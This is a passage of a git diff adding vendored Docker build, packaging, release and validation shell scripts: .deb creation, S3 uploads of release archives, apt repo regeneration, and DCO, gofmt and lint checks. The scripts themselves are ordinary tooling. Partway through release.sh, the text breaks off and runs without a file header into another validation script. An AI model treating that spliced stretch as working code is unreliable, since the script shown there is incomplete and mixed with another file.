INCBUILD="-i" + count=0 + for flag in "${BUILDFLAGS[@]}"; do + if [ "${flag}" == ${INCBUILD} ]; then + unset BUILDFLAGS[${count}] + break + fi + count=$[ ${count} + 1 ] + done + + date + if [ -z "$TESTDIRS" ]; then + TEST_PATH=./... + else + TEST_PATH=./${TESTDIRS} + fi + + if [ "$(go env GOHOSTOS)" = 'solaris' ]; then + pkg_list=$(go list -e \ + -f '{{if ne .Name "github.com/docker/docker"}} + {{.ImportPath}} + {{end}}' \ + "${BUILDFLAGS[@]}" $TEST_PATH \ + | grep github.com/docker/docker \ + | grep -v github.com/docker/docker/vendor \ + | grep -v github.com/docker/docker/daemon/graphdriver \ + | grep -v github.com/docker/docker/man \ + | grep -v github.com/docker/docker/integration-cli) + else + pkg_list=$(go list -e \ + -f '{{if ne .Name "github.com/docker/docker"}} + {{.ImportPath}} + {{end}}' \ + "${BUILDFLAGS[@]}" $TEST_PATH \ + | grep github.com/docker/docker \ + | grep -v github.com/docker/docker/vendor \ + | grep -v github.com/docker/docker/man \ + | grep -v github.com/docker/docker/integration-cli) + fi + + go test -cover -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" $TESTFLAGS $pkg_list +} + +bundle_test_unit 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/tgz b/vendor/github.com/docker/docker/hack/make/tgz new file mode 100644 index 0000000000..3ccd93fa01 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/tgz @@ -0,0 +1,92 @@ +#!/bin/bash + +CROSS="$DEST/../cross" + +set -e + +arch=$(go env GOHOSTARCH) +if [ ! -d "$CROSS/linux/${arch}" ]; then + echo >&2 'error: binary and cross must be run before tgz' + false +fi + +( +for d in "$CROSS/"*/*; do + export GOARCH="$(basename "$d")" + export GOOS="$(basename "$(dirname "$d")")" + + source "${MAKEDIR}/.binary-setup" + + BINARY_NAME="${DOCKER_CLIENT_BINARY_NAME}-$VERSION" + DAEMON_BINARY_NAME="${DOCKER_DAEMON_BINARY_NAME}-$VERSION" + PROXY_BINARY_NAME="${DOCKER_PROXY_BINARY_NAME}-$VERSION" + BINARY_EXTENSION="$(export GOOS && binary_extension)" + if [ "$GOOS" = 'windows' ]; then + # if windows use a zip, not tgz + BUNDLE_EXTENSION=".zip" + IS_TAR="false" + elif [ "$GOOS" == "solaris" ]; then + # Solaris bypasses cross due to CGO issues. + continue + else + BUNDLE_EXTENSION=".tgz" + IS_TAR="true" + fi + BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" + DAEMON_BINARY_FULLNAME="$DAEMON_BINARY_NAME$BINARY_EXTENSION" + PROXY_BINARY_FULLNAME="$PROXY_BINARY_NAME$BINARY_EXTENSION" + mkdir -p "$DEST/$GOOS/$GOARCH" + TGZ="$DEST/$GOOS/$GOARCH/$BINARY_NAME$BUNDLE_EXTENSION" + + # The staging directory for the files in the tgz + BUILD_PATH="$DEST/build" + + # The directory that is at the root of the tar file + TAR_BASE_DIRECTORY="docker" + + # $DEST/build/docker + TAR_PATH="$BUILD_PATH/$TAR_BASE_DIRECTORY" + + # Copy the correct docker binary + mkdir -p $TAR_PATH + cp -L "$d/$BINARY_FULLNAME" "$TAR_PATH/${DOCKER_CLIENT_BINARY_NAME}${BINARY_EXTENSION}" + if [ -f "$d/$DAEMON_BINARY_FULLNAME" ]; then + cp -L "$d/$DAEMON_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_DAEMON_BINARY_NAME}${BINARY_EXTENSION}" + fi + if [ -f "$d/$PROXY_BINARY_FULLNAME" ]; then + cp -L "$d/$PROXY_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_PROXY_BINARY_NAME}${BINARY_EXTENSION}" + fi + + # copy over all the extra binaries + copy_binaries $TAR_PATH + + # add completions + for s in bash fish zsh; do + mkdir -p $TAR_PATH/completion/$s + cp -L contrib/completion/$s/*docker* $TAR_PATH/completion/$s/ + done + + if [ "$IS_TAR" == "true" ]; then + echo "Creating tgz from $BUILD_PATH and naming it $TGZ" + tar --numeric-owner --owner 0 -C "$BUILD_PATH" -czf "$TGZ" $TAR_BASE_DIRECTORY + else + # ZIP needs to full absolute dir path, not the absolute path + ZIP=`pwd`"/$TGZ" + # keep track of where we are, for later. + pushd . + # go into the BUILD_PATH since zip does not have a -C equivalent. + cd $BUILD_PATH + echo "Creating zip from $BUILD_PATH and naming it $ZIP" + zip -q -r $ZIP $TAR_BASE_DIRECTORY + # go back to where we started + popd + fi + + hash_files "$TGZ" + + # cleanup after ourselves + rm -rf "$BUILD_PATH" + + echo "Created tgz: $TGZ" +done +) diff --git a/vendor/github.com/docker/docker/hack/make/ubuntu b/vendor/github.com/docker/docker/hack/make/ubuntu new file mode 100644 index 0000000000..8de5d9ceac --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/ubuntu @@ -0,0 +1,190 @@ +#!/bin/bash + +PKGVERSION="${VERSION//-/'~'}" +# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better +if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + GIT_UNIX="$(git log -1 --pretty='%at')" + GIT_DATE="$(date --date "@$GIT_UNIX" +'%Y%m%d.%H%M%S')" + GIT_COMMIT="$(git log -1 --pretty='%h')" + GIT_VERSION="git${GIT_DATE}.0.${GIT_COMMIT}" + # GIT_VERSION is now something like 'git20150128.112847.0.17e840a' + PKGVERSION="$PKGVERSION~$GIT_VERSION" +fi + +# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false +# true +# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false +# true +# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false +# true + +# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a + +PACKAGE_ARCHITECTURE="$(dpkg-architecture -qDEB_HOST_ARCH)" +PACKAGE_URL="https://www.docker.com/" +PACKAGE_MAINTAINER="support@docker.com" +PACKAGE_DESCRIPTION="Linux container runtime +Docker complements LXC with a high-level API which operates at the process +level. It runs unix processes with strong guarantees of isolation and +repeatability across servers. +Docker is a great building block for automating distributed systems: +large-scale web deployments, database clusters, continuous deployment systems, +private PaaS, service-oriented architectures, etc." +PACKAGE_LICENSE="Apache-2.0" + +# Build docker as an ubuntu package using FPM and REPREPRO (sue me). +# bundle_binary must be called first. +bundle_ubuntu() { + DIR="$ABS_DEST/build" + + # Include our udev rules + mkdir -p "$DIR/etc/udev/rules.d" + cp contrib/udev/80-docker.rules "$DIR/etc/udev/rules.d/" + + # Include our init scripts + mkdir -p "$DIR/etc/init" + cp contrib/init/upstart/docker.conf "$DIR/etc/init/" + mkdir -p "$DIR/etc/init.d" + cp contrib/init/sysvinit-debian/docker "$DIR/etc/init.d/" + mkdir -p "$DIR/etc/default" + cp contrib/init/sysvinit-debian/docker.default "$DIR/etc/default/docker" + mkdir -p "$DIR/lib/systemd/system" + cp contrib/init/systemd/docker.{service,socket} "$DIR/lib/systemd/system/" + + # Include contributed completions + mkdir -p "$DIR/etc/bash_completion.d" + cp contrib/completion/bash/docker "$DIR/etc/bash_completion.d/" + mkdir -p "$DIR/usr/share/zsh/vendor-completions" + cp contrib/completion/zsh/_docker "$DIR/usr/share/zsh/vendor-completions/" + mkdir -p "$DIR/etc/fish/completions" + cp contrib/completion/fish/docker.fish "$DIR/etc/fish/completions/" + + # Include man pages + make manpages + manRoot="$DIR/usr/share/man" + mkdir -p "$manRoot" + for manDir in man/man?; do + manBase="$(basename "$manDir")" # "man1" + for manFile in "$manDir"/*; do + manName="$(basename "$manFile")" # "docker-build.1" + mkdir -p "$manRoot/$manBase" + gzip -c "$manFile" > "$manRoot/$manBase/$manName.gz" + done + done + + # Copy the binary + # This will fail if the binary bundle hasn't been built + mkdir -p "$DIR/usr/bin" + cp "$DEST/../binary/docker-$VERSION" "$DIR/usr/bin/docker" + + # Generate postinst/prerm/postrm scripts + cat > "$DEST/postinst" <<'EOF' +#!/bin/sh +set -e +set -u + +if [ "$1" = 'configure' ] && [ -z "$2" ]; then + if ! getent group docker > /dev/null; then + groupadd --system docker + fi +fi + +if ! { [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; }; then + # we only need to do this if upstart isn't in charge + update-rc.d docker defaults > /dev/null || true +fi +if [ -n "$2" ]; then + _dh_action=restart +else + _dh_action=start +fi +service docker $_dh_action 2>/dev/null || true + +#DEBHELPER# +EOF + cat > "$DEST/prerm" <<'EOF' +#!/bin/sh +set -e +set -u + +service docker stop 2>/dev/null || true + +#DEBHELPER# +EOF + cat > "$DEST/postrm" <<'EOF' +#!/bin/sh +set -e +set -u + +if [ "$1" = "purge" ] ; then + update-rc.d docker remove > /dev/null || true +fi + +# In case this system is running systemd, we make systemd reload the unit files +# to pick up changes. +if [ -d /run/systemd/system ] ; then + systemctl --system daemon-reload > /dev/null || true +fi + +#DEBHELPER# +EOF + # TODO swaths of these were borrowed from debhelper's auto-inserted stuff, because we're still using fpm - we need to use debhelper instead, and somehow reconcile Ubuntu that way + chmod +x "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" + + ( + # switch directories so we create *.deb in the right folder + cd "$DEST" + + # create lxc-docker-VERSION package + fpm -s dir -C "$DIR" \ + --name "lxc-docker-$VERSION" --version "$PKGVERSION" \ + --after-install "$ABS_DEST/postinst" \ + --before-remove "$ABS_DEST/prerm" \ + --after-remove "$ABS_DEST/postrm" \ + --architecture "$PACKAGE_ARCHITECTURE" \ + --prefix / \ + --depends iptables \ + --deb-recommends aufs-tools \ + --deb-recommends ca-certificates \ + --deb-recommends git \ + --deb-recommends xz-utils \ + --deb-recommends 'cgroupfs-mount | cgroup-lite' \ + --deb-suggests apparmor \ + --description "$PACKAGE_DESCRIPTION" \ + --maintainer "$PACKAGE_MAINTAINER" \ + --conflicts docker \ + --conflicts docker.io \ + --conflicts lxc-docker-virtual-package \ + --provides lxc-docker \ + --provides lxc-docker-virtual-package \ + --replaces lxc-docker \ + --replaces lxc-docker-virtual-package \ + --url "$PACKAGE_URL" \ + --license "$PACKAGE_LICENSE" \ + --config-files /etc/udev/rules.d/80-docker.rules \ + --config-files /etc/init/docker.conf \ + --config-files /etc/init.d/docker \ + --config-files /etc/default/docker \ + --deb-compression gz \ + -t deb . + # TODO replace "Suggests: cgroup-lite" with "Recommends: cgroupfs-mount | cgroup-lite" once cgroupfs-mount is available + + # create empty lxc-docker wrapper package + fpm -s empty \ + --name lxc-docker --version "$PKGVERSION" \ + --architecture "$PACKAGE_ARCHITECTURE" \ + --depends lxc-docker-$VERSION \ + --description "$PACKAGE_DESCRIPTION" \ + --maintainer "$PACKAGE_MAINTAINER" \ + --url "$PACKAGE_URL" \ + --license "$PACKAGE_LICENSE" \ + --deb-compression gz \ + -t deb + ) + + # clean up after ourselves so we have a clean output directory + rm "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" + rm -r "$DIR" +} + +bundle_ubuntu diff --git a/vendor/github.com/docker/docker/hack/make/update-apt-repo b/vendor/github.com/docker/docker/hack/make/update-apt-repo new file mode 100755 index 0000000000..7354a2ecff --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/update-apt-repo @@ -0,0 +1,70 @@ +#!/bin/bash +set -e + +# This script updates the apt repo in $DOCKER_RELEASE_DIR/apt/repo. +# This script is a "fix all" for any sort of problems that might have occurred with +# the Release or Package files in the repo. +# It should only be used in the rare case of extreme emergencies to regenerate +# Release and Package files for the apt repo. +# +# NOTE: Always be sure to re-sign the repo with hack/make/sign-repos after running +# this script. + +: ${DOCKER_RELEASE_DIR:=$DEST} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo + +# supported arches/sections +arches=( amd64 i386 ) + +# Preserve existing components but don't add any non-existing ones +for component in main testing experimental ; do + if ls "$APTDIR/dists/*/$component" >/dev/null 2>&1 ; then + components+=( $component ) + fi +done + +dists=( $(find "${APTDIR}/dists" -maxdepth 1 -mindepth 1 -type d) ) + +# override component if it is set +if [ "$COMPONENT" ]; then + components=( $COMPONENT ) +fi + +# release the debs +for version in "${dists[@]}"; do + for component in "${components[@]}"; do + codename="${version//debootstrap-}" + + # update the filelist for this codename/component + find "$APTDIR/pool/$component" \ + -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" + done +done + +# run the apt-ftparchive commands so we can have pinning +apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" + +for dist in "${dists[@]}"; do + version=$(basename "$dist") + for component in "${components[@]}"; do + codename="${version//debootstrap-}" + + apt-ftparchive \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + release \ + "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" + + for arch in "${arches[@]}"; do + apt-ftparchive \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + -o "APT::FTPArchive::Release::Component=$component" \ + -o "APT::FTPArchive::Release::Architecture=$arch" \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + release \ + "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" + done + done +done diff --git a/vendor/github.com/docker/docker/hack/make/win b/vendor/github.com/docker/docker/hack/make/win new file mode 100644 index 0000000000..f9f4111276 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/win @@ -0,0 +1,20 @@ +#!/bin/bash +set -e + +# explicit list of os/arch combos that support being a daemon +declare -A daemonSupporting +daemonSupporting=( + [linux/amd64]=1 + [windows/amd64]=1 +) +platform="windows/amd64" +export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION +mkdir -p "$DEST" +ABS_DEST="$(cd "$DEST" && pwd -P)" +export GOOS=${platform%/*} +export GOARCH=${platform##*/} +if [ -z "${daemonSupporting[$platform]}" ]; then + export LDFLAGS_STATIC_DOCKER="" # we just need a simple client for these platforms + export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) # remove the "daemon" build tag from platforms that aren't supported +fi +source "${MAKEDIR}/binary" diff --git a/vendor/github.com/docker/docker/hack/release.sh b/vendor/github.com/docker/docker/hack/release.sh new file mode 100755 index 0000000000..4b020537ea --- /dev/null +++ b/vendor/github.com/docker/docker/hack/release.sh @@ -0,0 +1,325 @@ +#!/usr/bin/env bash +set -e + +# This script looks for bundles built by make.sh, and releases them on a +# public S3 bucket. +# +# Bundles should be available for the VERSION string passed as argument. +# +# The correct way to call this script is inside a container built by the +# official Dockerfile at the root of the Docker source code. The Dockerfile, +# make.sh and release.sh should all be from the same source code revision. + +set -o pipefail + +# Print a usage message and exit. +usage() { + cat >&2 <<'EOF' +To run, I need: +- to be in a container generated by the Dockerfile at the top of the Docker + repository; +- to be provided with the location of an S3 bucket and path, in + environment variables AWS_S3_BUCKET and AWS_S3_BUCKET_PATH (default: ''); +- to be provided with AWS credentials for this S3 bucket, in environment + variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY; +- a generous amount of good will and nice manners. +The canonical way to run me is to run the image produced by the Dockerfile: e.g.:" + +docker run -e AWS_S3_BUCKET=test.docker.com \ + -e AWS_ACCESS_KEY_ID \ + -e AWS_SECRET_ACCESS_KEY \ + -e AWS_DEFAULT_REGION \ + -it --privileged \ + docker ./hack/release.sh +EOF + exit 1 +} + +[ "$AWS_S3_BUCKET" ] || usage +[ "$AWS_ACCESS_KEY_ID" ] || usage +[ "$AWS_SECRET_ACCESS_KEY" ] || usage +[ -d /go/src/github.com/docker/docker ] || usage +cd /go/src/github.com/docker/docker +[ -x hack/make.sh ] || usage + +export AWS_DEFAULT_REGION +: ${AWS_DEFAULT_REGION:=us-west-1} + +AWS_CLI=${AWS_CLI:-'aws'} + +RELEASE_BUNDLES=( + binary + cross + tgz +) + +if [ "$1" != '--release-regardless-of-test-failure' ]; then + RELEASE_BUNDLES=( + test-unit + "${RELEASE_BUNDLES[@]}" + test-integration-cli + ) +fi + +VERSION=$(< VERSION) +BUCKET=$AWS_S3_BUCKET +BUCKET_PATH=$BUCKET +[[ -n "$AWS_S3_BUCKET_PATH" ]] && BUCKET_PATH+=/$AWS_S3_BUCKET_PATH + +if command -v git &> /dev/null && git rev-parse &> /dev/null; then + if [ -n "$(git status --porcelain --untracked-files=no)" ]; then + echo "You cannot run the release script on a repo with uncommitted changes" + usage + fi +fi + +# These are the 2 keys we've used to sign the deb's +# release (get.docker.com) +# GPG_KEY="36A1D7869245C8950F966E92D8576A8BA88D21E9" +# test (test.docker.com) +# GPG_KEY="740B314AE3941731B942C66ADF4FD13717AAD7D6" + +setup_s3() { + echo "Setting up S3" + # Try creating the bucket. Ignore errors (it might already exist). + $AWS_CLI s3 mb "s3://$BUCKET" 2>/dev/null || true + # Check access to the bucket. + $AWS_CLI s3 ls "s3://$BUCKET" >/dev/null + # Make the bucket accessible through website endpoints. + $AWS_CLI s3 website --index-document index --error-document error "s3://$BUCKET" +} + +# write_to_s3 uploads the contents of standard input to the specified S3 url. +write_to_s3() { + DEST=$1 + F=`mktemp` + cat > "$F" + $AWS_CLI s3 cp --acl public-read --content-type 'text/plain' "$F" "$DEST" + rm -f "$F" +} + +s3_url() { + case "$BUCKET" in + get.docker.com|test.docker.com|experimental.docker.com) + echo "https://$BUCKET_PATH" + ;; + *) + BASE_URL="http://${BUCKET}.s3-website-${AWS_DEFAULT_REGION}.amazonaws.com" + if [[ -n "$AWS_S3_BUCKET_PATH" ]] ; then + echo "$BASE_URL/$AWS_S3_BUCKET_PATH" + else + echo "$BASE_URL" + fi + ;; + esac +} + +build_all() { + echo "Building release" + if ! ./hack/make.sh "${RELEASE_BUNDLES[@]}"; then + echo >&2 + echo >&2 'The build or tests appear to have failed.' + echo >&2 + echo >&2 'You, as the release maintainer, now have a couple options:' + echo >&2 '- delay release and fix issues' + echo >&2 '- delay release and fix issues' + echo >&2 '- did we mention how important this is? issues need fixing :)' + echo >&2 + echo >&2 'As a final LAST RESORT, you (because only you, the release maintainer,' + echo >&2 ' really knows all the hairy problems at hand with the current release' + echo >&2 ' issues) may bypass this checking by running this script again with the' + echo >&2 ' single argument of "--release-regardless-of-test-failure", which will skip' + echo >&2 ' running the test suite, and will only build the binaries and packages. Please' + echo >&2 ' avoid using this if at all possible.' + echo >&2 + echo >&2 'Regardless, we cannot stress enough the scarcity with which this bypass' + echo >&2 ' should be used. If there are release issues, we should always err on the' + echo >&2 ' side of caution.' + echo >&2 + exit 1 + fi +} + +upload_release_build() { + src="$1" + dst="$2" + latest="$3" + + echo + echo "Uploading $src" + echo " to $dst" + echo + $AWS_CLI s3 cp --follow-symlinks --acl public-read "$src" "$dst" + if [ "$latest" ]; then + echo + echo "Copying to $latest" + echo + $AWS_CLI s3 cp --acl public-read "$dst" "$latest" + fi + + # get hash files too (see hash_files() in hack/make.sh) + for hashAlgo in md5 sha256; do + if [ -e "$src.$hashAlgo" ]; then + echo + echo "Uploading $src.$hashAlgo" + echo " to $dst.$hashAlgo" + echo + $AWS_CLI s3 cp --follow-symlinks --acl public-read --content-type='text/plain' "$src.$hashAlgo" "$dst.$hashAlgo" + if [ "$latest" ]; then + echo + echo "Copying to $latest.$hashAlgo" + echo + $AWS_CLI s3 cp --acl public-read "$dst.$hashAlgo" "$latest.$hashAlgo" + fi + fi + done +} + +release_build() { + echo "Releasing binaries" + GOOS=$1 + GOARCH=$2 + + binDir=bundles/$VERSION/cross/$GOOS/$GOARCH + tgzDir=bundles/$VERSION/tgz/$GOOS/$GOARCH + binary=docker-$VERSION + zipExt=".tgz" + binaryExt="" + tgz=$binary$zipExt + + latestBase= + if [ -z "$NOLATEST" ]; then + latestBase=docker-latest + fi + + # we need to map our GOOS and GOARCH to uname values + # see https://en.wikipedia.org/wiki/Uname + # ie, GOOS=linux -> "uname -s"=Linux + + s3Os=$GOOS + case "$s3Os" in + darwin) + s3Os=Darwin + ;; + freebsd) + s3Os=FreeBSD + ;; + linux) + s3Os=Linux + ;; + solaris) + echo skipping solaris release + return 0 + ;; + windows) + # this is windows use the .zip and .exe extensions for the files. + s3Os=Windows + zipExt=".zip" + binaryExt=".exe" + tgz=$binary$zipExt + binary+=$binaryExt + ;; + *) + echo >&2 "error: can't convert $s3Os to an appropriate value for 'uname -s'" + exit 1 + ;; + esac + + s3Arch=$GOARCH + case "$s3Arch" in + amd64) + s3Arch=x86_64 + ;; + 386) + s3Arch=i386 + ;; + arm) + s3Arch=armel + # someday, we might potentially support multiple GOARM values, in which case we might get armhf here too + ;; + *) + echo >&2 "error: can't convert $s3Arch to an appropriate value for 'uname -m'" + exit 1 + ;; + esac + + s3Dir="s3://$BUCKET_PATH/builds/$s3Os/$s3Arch" + # latest= + latestTgz= + if [ "$latestBase" ]; then + # commented out since we aren't uploading binaries right now. + # latest="$s3Dir/$latestBase$binaryExt" + # we don't include the $binaryExt because we don't want docker.exe.zip + latestTgz="$s3Dir/$latestBase$zipExt" + fi + + if [ ! -f "$tgzDir/$tgz" ]; then + echo >&2 "error: can't find $tgzDir/$tgz - was it packaged properly?" + exit 1 + fi + # disable binary uploads for now. Only providing tgz downloads + # upload_release_build "$binDir/$binary" "$s3Dir/$binary" "$latest" + upload_release_build "$tgzDir/$tgz" "$s3Dir/$tgz" "$latestTgz" +} + +# Upload binaries and tgz files to S3 +release_binaries() { + [ "$(find bundles/$VERSION -path "bundles/$VERSION/cross/*/*/docker-$VERSION")" != "" ] || { + echo >&2 './hack/make.sh must be run before release_binaries' + exit 1 + } + + for d in bundles/$VERSION/cross/*/*; do + GOARCH="$(basename "$d")" + GOOS="$(basename "$(dirname "$d")")" + release_build "$GOOS" "$GOARCH" + done + + # TODO create redirect from builds/*/i686 to builds/*/i386 + + cat < /dev/null + # Let see if the working directory is clean + diffs="$(git status --porcelain -- cli/compose/schema 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of `go generate github.com/docker/docker/cli/compose/schema` differs' + echo + echo "$diffs" + echo + echo 'Please run `go generate github.com/docker/docker/cli/compose/schema`' + } >&2 + false + else + echo 'Congratulations! cli/compose/schema/bindata.go is up-to-date.' + fi +else + echo 'No cli/compose/schema/data changes in diff.' +fi diff --git a/vendor/github.com/docker/docker/hack/validate/dco b/vendor/github.com/docker/docker/hack/validate/dco new file mode 100755 index 0000000000..754ce8faec --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/dco @@ -0,0 +1,55 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +adds=$(validate_diff --numstat | awk '{ s += $1 } END { print s }') +dels=$(validate_diff --numstat | awk '{ s += $2 } END { print s }') +#notDocs="$(validate_diff --numstat | awk '$3 !~ /^docs\// { print $3 }')" + +: ${adds:=0} +: ${dels:=0} + +# "Username may only contain alphanumeric characters or dashes and cannot begin with a dash" +githubUsernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+' + +# https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work +dcoPrefix='Signed-off-by:' +dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($githubUsernameRegex)\\))?$" + +check_dco() { + grep -qE "$dcoRegex" +} + +if [ $adds -eq 0 -a $dels -eq 0 ]; then + echo '0 adds, 0 deletions; nothing to validate! :)' +else + commits=( $(validate_log --format='format:%H%n') ) + badCommits=() + for commit in "${commits[@]}"; do + if [ -z "$(git log -1 --format='format:' --name-status "$commit")" ]; then + # no content (ie, Merge commit, etc) + continue + fi + if ! git log -1 --format='format:%B' "$commit" | check_dco; then + badCommits+=( "$commit" ) + fi + done + if [ ${#badCommits[@]} -eq 0 ]; then + echo "Congratulations! All commits are properly signed with the DCO!" + else + { + echo "These commits do not have a proper '$dcoPrefix' marker:" + for commit in "${badCommits[@]}"; do + echo " - $commit" + done + echo + echo 'Please amend each commit to include a properly formatted DCO marker.' + echo + echo 'Visit the following URL for information about the Docker DCO:' + echo ' https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work' + echo + } >&2 + false + fi +fi diff --git a/vendor/github.com/docker/docker/hack/validate/default b/vendor/github.com/docker/docker/hack/validate/default new file mode 100755 index 0000000000..29b96ca9a3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/default @@ -0,0 +1,16 @@ +#!/bin/bash +# +# Run default validation, exclude vendor because it's slow + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" + +. $SCRIPTDIR/dco +. $SCRIPTDIR/default-seccomp +. $SCRIPTDIR/gofmt +. $SCRIPTDIR/lint +. $SCRIPTDIR/pkg-imports +. $SCRIPTDIR/swagger +. $SCRIPTDIR/swagger-gen +. $SCRIPTDIR/test-imports +. $SCRIPTDIR/toml +. $SCRIPTDIR/vet diff --git a/vendor/github.com/docker/docker/hack/validate/default-seccomp b/vendor/github.com/docker/docker/hack/validate/default-seccomp new file mode 100755 index 0000000000..8fe8435618 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/default-seccomp @@ -0,0 +1,28 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'profiles/seccomp' || true) ) +unset IFS + +if [ ${#files[@]} -gt 0 ]; then + # We run 'go generate' and see if we have a diff afterwards + go generate ./profiles/seccomp/ >/dev/null + # Let see if the working directory is clean + diffs="$(git status --porcelain -- profiles/seccomp 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of go generate ./profiles/seccomp/ differs' + echo + echo "$diffs" + echo + echo 'Please re-run go generate ./profiles/seccomp/' + echo + } >&2 + false + else + echo 'Congratulations! Seccomp profile generation is done correctly.' + fi +fi diff --git a/vendor/github.com/docker/docker/hack/validate/gofmt b/vendor/github.com/docker/docker/hack/validate/gofmt new file mode 100755 index 0000000000..2040afa09e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/gofmt @@ -0,0 +1,33 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | + grep -v '^vendor/' | + grep -v '^cli/compose/schema/bindata.go' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + # we use "git show" here to validate that what's committed is formatted + if [ "$(git show "$VALIDATE_HEAD:$f" | gofmt -s -l)" ]; then + badFiles+=( "$f" ) + fi +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! All Go source files are properly formatted.' +else + { + echo "These files are not properly gofmt'd:" + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + echo 'Please reformat the above files using "gofmt -s -w" and commit the result.' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/lint b/vendor/github.com/docker/docker/hack/validate/lint new file mode 100755 index 0000000000..4ac0a33b20 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/lint @@ -0,0 +1,31 @@ +#!/bin/bash + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' | grep -v '^cli/compose/schema/bindata.go' || true) ) +unset IFS + +errors=() +for f in "${files[@]}"; do + failedLint=$(golint "$f") + if [ "$failedLint" ]; then + errors+=( "$failedLint" ) + fi +done + +if [ ${#errors[@]} -eq 0 ]; then + echo 'Congratulations! All Go source files have been linted.' +else + { + echo "Errors from golint:" + for err in "${errors[@]}"; do + echo "$err" + done + echo + echo 'Please fix the above errors. You can test via "golint" and commit the result.' + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/pkg-imports b/vendor/github.com/docker/docker/hack/validate/pkg-imports new file mode 100755 index 0000000000..9e4ea74da0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/pkg-imports @@ -0,0 +1,33 @@ +#!/bin/bash +set -e + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +IFS=$'\n' +files=( $(validate_diff --diff-filter=ACMR --name-only -- 'pkg/*.go' || true) ) +unset IFS + +badFiles=() +for f in "${files[@]}"; do + IFS=$'\n' + badImports=( $(go list -e -f '{{ join .Deps "\n" }}' "$f" | sort -u | grep -vE '^github.com/docker/docker/pkg/' | grep -vE '^github.com/docker/docker/vendor' | grep -E '^github.com/docker/docker' || true) ) + unset IFS + + for import in "${badImports[@]}"; do + badFiles+=( "$f imports $import" ) + done +done + +if [ ${#badFiles[@]} -eq 0 ]; then + echo 'Congratulations! "./pkg/..." is safely isolated from internal code.' +else + { + echo 'These files import internal code: (either directly or indirectly)' + for f in "${badFiles[@]}"; do + echo " - $f" + done + echo + } >&2 + false +fi diff --git a/vendor/github.com/docker/docker/hack/validate/swagger b/vendor/github.com/docker/docker/hack/validate/swagger new file mode 100755 index 0000000000..e754fb8cb9 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/swagger @@ -0,0 +1,13 @@ +#!/bin/bash +set -e +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" 